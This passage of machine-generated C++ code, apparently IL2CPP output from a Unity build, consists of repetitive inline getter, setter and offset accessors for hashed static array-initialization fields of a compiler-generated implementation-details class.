__StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 get_U3320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20() const { return ___320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20; } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 * get_address_of_U3320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20() { return &___320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20; } inline void set_U3320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20(__StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 value) { ___320B018758ECE3752FFEDBAEB1A6DB67C80B9359_20 = value; } inline static int32_t get_offset_of_U334476C29F6F81C989CFCA42F7C06E84C66236834_21() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___34476C29F6F81C989CFCA42F7C06E84C66236834_21)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U334476C29F6F81C989CFCA42F7C06E84C66236834_21() const { return ___34476C29F6F81C989CFCA42F7C06E84C66236834_21; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U334476C29F6F81C989CFCA42F7C06E84C66236834_21() { return &___34476C29F6F81C989CFCA42F7C06E84C66236834_21; } inline void set_U334476C29F6F81C989CFCA42F7C06E84C66236834_21(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___34476C29F6F81C989CFCA42F7C06E84C66236834_21 = value; } inline static int32_t get_offset_of_U335EED060772F2748D13B745DAEC8CD7BD3B87604_22() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___35EED060772F2748D13B745DAEC8CD7BD3B87604_22)); } inline __StaticArrayInitTypeSizeU3D2382_tB4AF2C49C5120B6EB285BA4D247340D8E243A1BA get_U335EED060772F2748D13B745DAEC8CD7BD3B87604_22() const { return ___35EED060772F2748D13B745DAEC8CD7BD3B87604_22; } inline __StaticArrayInitTypeSizeU3D2382_tB4AF2C49C5120B6EB285BA4D247340D8E243A1BA * get_address_of_U335EED060772F2748D13B745DAEC8CD7BD3B87604_22() { return &___35EED060772F2748D13B745DAEC8CD7BD3B87604_22; } inline void set_U335EED060772F2748D13B745DAEC8CD7BD3B87604_22(__StaticArrayInitTypeSizeU3D2382_tB4AF2C49C5120B6EB285BA4D247340D8E243A1BA value) { ___35EED060772F2748D13B745DAEC8CD7BD3B87604_22 = value; } inline static int32_t get_offset_of_U3375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23)); } inline __StaticArrayInitTypeSizeU3D38_tA52D24A5F9970582D6B55437967C9BD32E03F05D get_U3375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23() const { return ___375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23; } inline __StaticArrayInitTypeSizeU3D38_tA52D24A5F9970582D6B55437967C9BD32E03F05D * get_address_of_U3375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23() { return &___375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23; } inline void set_U3375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23(__StaticArrayInitTypeSizeU3D38_tA52D24A5F9970582D6B55437967C9BD32E03F05D value) { ___375F9AE9769A3D1DA789E9ACFE81F3A1BB14F0D3_23 = value; } inline static int32_t get_offset_of_U3379C06C9E702D31469C29033F0DD63931EB349F5_24() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___379C06C9E702D31469C29033F0DD63931EB349F5_24)); } inline __StaticArrayInitTypeSizeU3D1450_t58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4 get_U3379C06C9E702D31469C29033F0DD63931EB349F5_24() const { return ___379C06C9E702D31469C29033F0DD63931EB349F5_24; } inline __StaticArrayInitTypeSizeU3D1450_t58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4 * get_address_of_U3379C06C9E702D31469C29033F0DD63931EB349F5_24() { return &___379C06C9E702D31469C29033F0DD63931EB349F5_24; } inline void set_U3379C06C9E702D31469C29033F0DD63931EB349F5_24(__StaticArrayInitTypeSizeU3D1450_t58DE69DB537BA7DFBFF2C7084FFC6970FB3BAEA4 value) { ___379C06C9E702D31469C29033F0DD63931EB349F5_24 = value; } inline static int32_t get_offset_of_U3399BD13E240F33F808CA7940293D6EC4E6FD5A00_25() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___399BD13E240F33F808CA7940293D6EC4E6FD5A00_25)); } inline __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C get_U3399BD13E240F33F808CA7940293D6EC4E6FD5A00_25() const { return ___399BD13E240F33F808CA7940293D6EC4E6FD5A00_25; } inline __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C * get_address_of_U3399BD13E240F33F808CA7940293D6EC4E6FD5A00_25() { return &___399BD13E240F33F808CA7940293D6EC4E6FD5A00_25; } inline void set_U3399BD13E240F33F808CA7940293D6EC4E6FD5A00_25(__StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C value) { ___399BD13E240F33F808CA7940293D6EC4E6FD5A00_25 = value; } inline static int32_t get_offset_of_U339C9CE73C7B0619D409EF28344F687C1B5C130FE_26() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___39C9CE73C7B0619D409EF28344F687C1B5C130FE_26)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U339C9CE73C7B0619D409EF28344F687C1B5C130FE_26() const { return ___39C9CE73C7B0619D409EF28344F687C1B5C130FE_26; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U339C9CE73C7B0619D409EF28344F687C1B5C130FE_26() { return &___39C9CE73C7B0619D409EF28344F687C1B5C130FE_26; } inline void set_U339C9CE73C7B0619D409EF28344F687C1B5C130FE_26(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___39C9CE73C7B0619D409EF28344F687C1B5C130FE_26 = value; } inline static int32_t get_offset_of_U33C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___3C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27)); } inline __StaticArrayInitTypeSizeU3D320_t48B9242FB90DB2A21A723BBAB141500A9641EB49 get_U33C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27() const { return ___3C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27; } inline __StaticArrayInitTypeSizeU3D320_t48B9242FB90DB2A21A723BBAB141500A9641EB49 * get_address_of_U33C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27() { return &___3C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27; } inline void set_U33C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27(__StaticArrayInitTypeSizeU3D320_t48B9242FB90DB2A21A723BBAB141500A9641EB49 value) { ___3C53AFB51FEC23491684C7BEDBC6D4E0F409F851_27 = value; } inline static int32_t get_offset_of_U33E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___3E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U33E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28() const { return ___3E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U33E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28() { return &___3E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28; } inline void set_U33E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___3E3442C7396F3F2BB4C7348F4A2074C7DC677D68_28 = value; } inline static int32_t get_offset_of_U33E823444D2DFECF0F90B436B88F02A533CB376F1_29() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___3E823444D2DFECF0F90B436B88F02A533CB376F1_29)); } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 get_U33E823444D2DFECF0F90B436B88F02A533CB376F1_29() const { return ___3E823444D2DFECF0F90B436B88F02A533CB376F1_29; } inline __StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 * get_address_of_U33E823444D2DFECF0F90B436B88F02A533CB376F1_29() { return &___3E823444D2DFECF0F90B436B88F02A533CB376F1_29; } inline void set_U33E823444D2DFECF0F90B436B88F02A533CB376F1_29(__StaticArrayInitTypeSizeU3D12_tB4B4C95019D88097B57DE7B50445942256BF2879 value) { ___3E823444D2DFECF0F90B436B88F02A533CB376F1_29 = value; } inline static int32_t get_offset_of_U33FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___3FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U33FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30() const { return ___3FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U33FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30() { return &___3FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30; } inline void set_U33FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___3FE6C283BCF384FD2C8789880DFF59664E2AB4A1_30 = value; } inline static int32_t get_offset_of_U340981BAA39513E58B28DCF0103CC04DE2A0A0444_31() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___40981BAA39513E58B28DCF0103CC04DE2A0A0444_31)); } inline __StaticArrayInitTypeSizeU3D1665_tCD7752863825B82B07752CCE72A581C169E19C20 get_U340981BAA39513E58B28DCF0103CC04DE2A0A0444_31() const { return ___40981BAA39513E58B28DCF0103CC04DE2A0A0444_31; } inline __StaticArrayInitTypeSizeU3D1665_tCD7752863825B82B07752CCE72A581C169E19C20 * get_address_of_U340981BAA39513E58B28DCF0103CC04DE2A0A0444_31() { return &___40981BAA39513E58B28DCF0103CC04DE2A0A0444_31; } inline void set_U340981BAA39513E58B28DCF0103CC04DE2A0A0444_31(__StaticArrayInitTypeSizeU3D1665_tCD7752863825B82B07752CCE72A581C169E19C20 value) { ___40981BAA39513E58B28DCF0103CC04DE2A0A0444_31 = value; } inline static int32_t get_offset_of_U340E7C49413D261F3F38AD3A870C0AC69C8BDA048_32() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___40E7C49413D261F3F38AD3A870C0AC69C8BDA048_32)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U340E7C49413D261F3F38AD3A870C0AC69C8BDA048_32() const { return ___40E7C49413D261F3F38AD3A870C0AC69C8BDA048_32; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U340E7C49413D261F3F38AD3A870C0AC69C8BDA048_32() { return &___40E7C49413D261F3F38AD3A870C0AC69C8BDA048_32; } inline void set_U340E7C49413D261F3F38AD3A870C0AC69C8BDA048_32(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___40E7C49413D261F3F38AD3A870C0AC69C8BDA048_32 = value; } inline static int32_t get_offset_of_U3421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U3421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33() const { return ___421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U3421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33() { return &___421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33; } inline void set_U3421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___421EC7E82F2967DF6CA8C3605514DC6F29EE5845_33 = value; } inline static int32_t get_offset_of_U3433175D38B13FFE177FDD661A309F1B528B3F6E2_34() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___433175D38B13FFE177FDD661A309F1B528B3F6E2_34)); } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F get_U3433175D38B13FFE177FDD661A309F1B528B3F6E2_34() const { return ___433175D38B13FFE177FDD661A309F1B528B3F6E2_34; } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F * get_address_of_U3433175D38B13FFE177FDD661A309F1B528B3F6E2_34() { return &___433175D38B13FFE177FDD661A309F1B528B3F6E2_34; } inline void set_U3433175D38B13FFE177FDD661A309F1B528B3F6E2_34(__StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F value) { ___433175D38B13FFE177FDD661A309F1B528B3F6E2_34 = value; } inline static int32_t get_offset_of_U34858DB4AA76D3933F1CA9E6712D4FDB16903F628_35() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___4858DB4AA76D3933F1CA9E6712D4FDB16903F628_35)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U34858DB4AA76D3933F1CA9E6712D4FDB16903F628_35() const { return ___4858DB4AA76D3933F1CA9E6712D4FDB16903F628_35; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U34858DB4AA76D3933F1CA9E6712D4FDB16903F628_35() { return &___4858DB4AA76D3933F1CA9E6712D4FDB16903F628_35; } inline void set_U34858DB4AA76D3933F1CA9E6712D4FDB16903F628_35(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___4858DB4AA76D3933F1CA9E6712D4FDB16903F628_35 = value; } inline static int32_t get_offset_of_U34E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___4E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36)); } inline __StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A get_U34E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36() const { return ___4E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36; } inline __StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A * get_address_of_U34E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36() { return &___4E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36; } inline void set_U34E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36(__StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A value) { ___4E3B533C39447AAEB59A8E48FABD7E15B5B5D195_36 = value; } inline static int32_t get_offset_of_U34F7A8890F332B22B8DE0BD29D36FA7364748D76A_37() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___4F7A8890F332B22B8DE0BD29D36FA7364748D76A_37)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U34F7A8890F332B22B8DE0BD29D36FA7364748D76A_37() const { return ___4F7A8890F332B22B8DE0BD29D36FA7364748D76A_37; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U34F7A8890F332B22B8DE0BD29D36FA7364748D76A_37() { return &___4F7A8890F332B22B8DE0BD29D36FA7364748D76A_37; } inline void set_U34F7A8890F332B22B8DE0BD29D36FA7364748D76A_37(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___4F7A8890F332B22B8DE0BD29D36FA7364748D76A_37 = value; } inline static int32_t get_offset_of_U3536422B321459B242ADED7240B7447E904E083E3_38() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___536422B321459B242ADED7240B7447E904E083E3_38)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U3536422B321459B242ADED7240B7447E904E083E3_38() const { return ___536422B321459B242ADED7240B7447E904E083E3_38; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U3536422B321459B242ADED7240B7447E904E083E3_38() { return &___536422B321459B242ADED7240B7447E904E083E3_38; } inline void set_U3536422B321459B242ADED7240B7447E904E083E3_38(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___536422B321459B242ADED7240B7447E904E083E3_38 = value; } inline static int32_t get_offset_of_U35382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___5382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39)); } inline __StaticArrayInitTypeSizeU3D1080_tCE36DA14009C45CFDEA7F63618BE90F8DF89AC84 get_U35382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39() const { return ___5382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39; } inline __StaticArrayInitTypeSizeU3D1080_tCE36DA14009C45CFDEA7F63618BE90F8DF89AC84 * get_address_of_U35382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39() { return &___5382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39; } inline void set_U35382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39(__StaticArrayInitTypeSizeU3D1080_tCE36DA14009C45CFDEA7F63618BE90F8DF89AC84 value) { ___5382CEF491F422BFE0D6FC46EFAFF9EF9D4C89F3_39 = value; } inline static int32_t get_offset_of_U356DFA5053B3131883637F53219E7D88CCEF35949_40() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___56DFA5053B3131883637F53219E7D88CCEF35949_40)); } inline __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C get_U356DFA5053B3131883637F53219E7D88CCEF35949_40() const { return ___56DFA5053B3131883637F53219E7D88CCEF35949_40; } inline __StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C * get_address_of_U356DFA5053B3131883637F53219E7D88CCEF35949_40() { return &___56DFA5053B3131883637F53219E7D88CCEF35949_40; } inline void set_U356DFA5053B3131883637F53219E7D88CCEF35949_40(__StaticArrayInitTypeSizeU3D10_t39E3D966A21885323F15EB866ABDE668EA1ED52C value) { ___56DFA5053B3131883637F53219E7D88CCEF35949_40 = value; } inline static int32_t get_offset_of_U357218C316B6921E2CD61027A2387EDC31A2D9471_41() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___57218C316B6921E2CD61027A2387EDC31A2D9471_41)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U357218C316B6921E2CD61027A2387EDC31A2D9471_41() const { return ___57218C316B6921E2CD61027A2387EDC31A2D9471_41; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U357218C316B6921E2CD61027A2387EDC31A2D9471_41() { return &___57218C316B6921E2CD61027A2387EDC31A2D9471_41; } inline void set_U357218C316B6921E2CD61027A2387EDC31A2D9471_41(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___57218C316B6921E2CD61027A2387EDC31A2D9471_41 = value; } inline static int32_t get_offset_of_U357F320D62696EC99727E0FE2045A05F1289CC0C6_42() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___57F320D62696EC99727E0FE2045A05F1289CC0C6_42)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_U357F320D62696EC99727E0FE2045A05F1289CC0C6_42() const { return ___57F320D62696EC99727E0FE2045A05F1289CC0C6_42; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_U357F320D62696EC99727E0FE2045A05F1289CC0C6_42() { return &___57F320D62696EC99727E0FE2045A05F1289CC0C6_42; } inline void set_U357F320D62696EC99727E0FE2045A05F1289CC0C6_42(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___57F320D62696EC99727E0FE2045A05F1289CC0C6_42 = value; } inline static int32_t get_offset_of_U3594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43)); } inline __StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF get_U3594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43() const { return ___594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43; } inline __StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF * get_address_of_U3594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43() { return &___594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43; } inline void set_U3594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43(__StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF value) { ___594A33A00BC4F785DFD43E3C6C44FBA1242CCAF3_43 = value; } inline static int32_t get_offset_of_U35BBDF8058D4235C33F2E8DCF76004031B6187A2F_44() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___5BBDF8058D4235C33F2E8DCF76004031B6187A2F_44)); } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 get_U35BBDF8058D4235C33F2E8DCF76004031B6187A2F_44() const { return ___5BBDF8058D4235C33F2E8DCF76004031B6187A2F_44; } inline __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 * get_address_of_U35BBDF8058D4235C33F2E8DCF76004031B6187A2F_44() { return &___5BBDF8058D4235C33F2E8DCF76004031B6187A2F_44; } inline void set_U35BBDF8058D4235C33F2E8DCF76004031B6187A2F_44(__StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 value) { ___5BBDF8058D4235C33F2E8DCF76004031B6187A2F_44 = value; } inline static int32_t get_offset_of_U35BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___5BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45)); } inline __StaticArrayInitTypeSizeU3D288_t7B40D7F3A8D262F90A76460FF94E92CE08AFCF55 get_U35BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45() const { return ___5BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45; } inline __StaticArrayInitTypeSizeU3D288_t7B40D7F3A8D262F90A76460FF94E92CE08AFCF55 * get_address_of_U35BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45() { return &___5BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45; } inline void set_U35BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45(__StaticArrayInitTypeSizeU3D288_t7B40D7F3A8D262F90A76460FF94E92CE08AFCF55 value) { ___5BCD21C341BE6DDF8FFFAE1A23ABA24DCBB612BF_45 = value; } inline static int32_t get_offset_of_U35BFE2819B4778217C56416C7585FF0E56EBACD89_46() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___5BFE2819B4778217C56416C7585FF0E56EBACD89_46)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U35BFE2819B4778217C56416C7585FF0E56EBACD89_46() const { return ___5BFE2819B4778217C56416C7585FF0E56EBACD89_46; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U35BFE2819B4778217C56416C7585FF0E56EBACD89_46() { return &___5BFE2819B4778217C56416C7585FF0E56EBACD89_46; } inline void set_U35BFE2819B4778217C56416C7585FF0E56EBACD89_46(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___5BFE2819B4778217C56416C7585FF0E56EBACD89_46 = value; } inline static int32_t get_offset_of_U3609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47)); } inline __StaticArrayInitTypeSizeU3D128_t1B13688BD6EA82B964734FF8C3181161EF5624B1 get_U3609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47() const { return ___609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47; } inline __StaticArrayInitTypeSizeU3D128_t1B13688BD6EA82B964734FF8C3181161EF5624B1 * get_address_of_U3609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47() { return &___609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47; } inline void set_U3609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47(__StaticArrayInitTypeSizeU3D128_t1B13688BD6EA82B964734FF8C3181161EF5624B1 value) { ___609C0E8D8DA86A09D6013D301C86BA8782C16B8C_47 = value; } inline static int32_t get_offset_of_U362BAB0F245E66C3EB982CF5A7015F0A7C3382283_48() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___62BAB0F245E66C3EB982CF5A7015F0A7C3382283_48)); } inline __StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A get_U362BAB0F245E66C3EB982CF5A7015F0A7C3382283_48() const { return ___62BAB0F245E66C3EB982CF5A7015F0A7C3382283_48; } inline __StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A * get_address_of_U362BAB0F245E66C3EB982CF5A7015F0A7C3382283_48() { return &___62BAB0F245E66C3EB982CF5A7015F0A7C3382283_48; } inline void 